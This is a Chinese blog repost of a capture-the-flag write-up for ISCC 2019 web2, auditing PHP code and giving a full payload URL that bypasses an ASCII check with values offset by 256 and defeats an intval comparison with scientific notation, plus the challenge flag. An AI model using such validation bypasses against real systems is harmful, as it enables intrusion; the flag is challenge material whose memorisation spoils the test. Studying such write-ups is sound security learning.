ISCC之web2

最新推荐文章于 2022-06-07 23:14:32 发布

digupang7059

最新推荐文章于 2022-06-07 23:14:32 发布

阅读量145

点赞数

文章标签： php

原文链接：http://www.cnblogs.com/mke2fs/p/10803926.html

版权

Php代码审计

PHP代码

<?php

error_reporting(0);

require 'flag.php';

$value = $_GET['value'];

$password = $_GET['password'];

$username = '';

for ($i = 0; $i < count($value); ++$i) {

if ($value[$i] > 32 && $value[$i] < 127) unset($value);

else $username .= chr($value[$i]); #将value数组中的值转化为ASCll码

if ($username == 'w3lc0me_To_ISCC2019' && intval($password) < 2333 && intval($password + 1) > 2333) {

echo 'Hello '.$username.'!', '<br>', PHP_EOL;

echo $flag, '<hr>';

}

highlight_file(__FILE__);

审计发现可以构造数组，将w3lc0me_To_ISCC2019构造成一个数组，放到value里面，

ASCll共计128个，因此要绕过限制，对ascll码值加256,

对于后面的2333，我们可以这样绕过

利用科学记数法10e4是100000，但是这里的intval()函数取整，会忽略,计算成10

10e4+1会计算成100001

Payload如下

http://39.100.83.188:8001/?&password=10e4&value[0]=375&value[1]=307&value[2]=364&value[3]=355&value[4]=304&value[5]=365&value[6]=357&value[7]=351&value[8]=340&value[9]=367&value[10]=351&value[11]=329&value[12]=339&value[13]=323&value[14]=323&value[15]=306&value[16]=304&value[17]=305&value[18]=313

结果

flag{8311873e241ccad54463eaa5d4efc1e9}

转载于:https://www.cnblogs.com/mke2fs/p/10803926.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

digupang7059

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

ISCCweb1

ChenZIDu的博客

09-22

622

<?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $username = ''; for ($i = 0; $i < count($value); ++$i) { if ($value[$i] > 32 &&a...

ISCC 2019 Web 2

qq_42777804的博客

05-24

768

源码如下 <?php error_reporting(0); require'flag.php'; $value=$_GET['value']; $password=$_GET['password']; $username=''; for($i=0;$i<count($value);++$i){ if($value[$i]>32&a...

参与评论您还未登录，请先登录后发表或查看评论

[xueqi]ISCC 2019 writeup 信息安全与对抗-解题思路xueqi

XUEQI的博客

10-12

1313

ISCC 2019 writeup-全国大学生信息安全与对抗技术竞赛解题思路xueqi WEB Web1 题目地址:http://39.100.83.188:8001 <?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $use...

web1 ISCC

沐目的博客

05-31

294

打开连接，又是审计， <?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $username = ''; for ($i = 0; $i < count($value); ++$i) { if ($value[$i] >...

ISCC2019Writeup

火柴人的博客

07-10

736

web1 源码如下 <?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $username = ''; for ($i = 0; $i < count($value); ++$i) { if ($valu...

CTFshow——web入门——php特性(下篇)

h_adam的博客

02-06

6219

web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))

ISCC 2018 WEB WriteUp

lacoucou的专栏

05-25

1961

1.php是世界上最好的语言 [分值:150]题目描述: php是世界上最好的语言听说你用php？题目地址: http://118.190.152.202:8005/题目内容：关键是在 md5(&password)这里，搜索一下，找到：https://blog.csdn.net/vspiders/...

ISCC2020-Web题解

Lemon's blog

05-27

2221

神秘组织的邮件-2 点击提交数字会发生改变，因为这次的赛制有一个关联，通过上一题得出的flag是加键乘除，又提示要联系起来，就想起了之前做有一道秋名山车神那道题，只不过这个题需要将运算符手动添加，脚本如下： import requests from bs4 import BeautifulSoup import re import time if __name__ == '__main__': time_start=time.time() url = 'http://101.201.126

2016 ISCC CTF 比赛 WEB类第一题

aj_shang的博客

06-06

3559

网站链接：http://101.200.145.44/web1/index.php.txt 当点击这里之后，后出现下图 1.点击source，出现源码，发现user==flag 2.注入sql语句 $sql = "select user from user where pw= ' $pass ' " 在密码栏中输入的值是$pass,将其替换为' or us

ISCC-2022 部分wp

qaq517384的博客

06-07

3223

目录Web冬奥会Misc单板小将苏翊鸣2022冬奥会藏在星空中的诗-1ReverseAmy's Code Web 冬奥会 $info[“year”]=2022，if比较的赋值，永真 0项值为0绕过array_search()函数，其他随意 payload： ?Information={"year":"a","items":[0,["1","2","3"],"1"]} Misc 单板小将苏翊鸣改图片高度得到二维码，扫码回答问题 15942为压缩包密码解压得到flag 2022冬奥会吉祥物（压缩包密码）

php error_reporting(0);,php error_reporting()函数的用法举例(错误捕捉)

weixin_42365604的博客

03-13

3574

php error_reporting()函数的用法举例，供大家学习参考。学习CI框架过程中遇到个问题:A PHP Error was encounteredSeverity: NoticeMessage: Undefined variable: user默认的普通PHP文件中输出一个未定义声明的变量是不会报错误的，但在codeigniter框架下却要报错误，这对于想集成添加和修改页面于一...

PHP渗透测试题目笔记

Zeker62的博客

02-10

5654

最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界：unserialize3题目解析攻防世界：PHP2 最简单反序列化漏洞简单实例，如下是一串简单的PHP代码，index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ

Solve Me解题记录

0verWatch的博客

08-14

3832

前言前一阵子关注点在实战上，现在又回归CTF学习套路了，这个网站本来做了一半的题目，今天终于把他补完了，学到了炒鸡多的东西啊~ 正文 Warm up 给出来一个密文和一段代码 1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY= &amp;amp;lt;?php error_reporting(0); require __D...

ISCC2019-web1

S1lenc3的博客

05-05

193

明显是代码审计 <?phperror_reporting(0);require'flag.php';$value=$_GET['value'];$password=$_GET['password'];$username='';for($i=0;$i<count($value);++$i){if($value[$i]>32&...

iscc2019

wuerror的博客

06-05

1019

iscc2019 misc welcome 加上后缀zip，打开将“蓅烺計劃洮蓠朩暒”替换为0，“戶囗萇條”替换为1。得到二进制串01100110011011000110000101100111011110110100100101010011010000110100001101011111010101110100010101001100010000110100111101001101010...

ISCC2019比赛部分writeup

守卫者安全

05-28

3975

Misc 1. 附件地址下载附件显示如下：看了半天像是ascll码，但是有的已经超出范围了。然后又觉得以0开头的是八进制的数，先进制转换。发现一段字符串看着像base64加密的解密得到flag 2.Aesop's secret 附件地址下载附件打开发现是一张gif图片，查看并没有什么卵用然后记事本打开看看，发现最后有一堆字符串，比较可疑 ...

ctf日常学习记录（web）

qq_27396789的博客

01-11

6349

爆破1题目提示：flag就在某六位变量中。点开题目链接显示代码：<?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?>关键是这个东西var_dump($$

i春秋WEB CTF 1

cbhjerry的博客

10-23

1798

题1：爆破-1，flag就在某六位变量中 <?php include"flag.php"; $a=@$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a)){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> 解题：URL/?hello=GLO...

ISCC-2019部分wp

Sea_Sand息禅

06-06

1456

web 1、web2 很清楚的提示，破解三位数的密码，同时也需使验证码正确，抓包进行爆破得到flag： 2、web1 <?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $username = ''; for ($i =...

ISCC where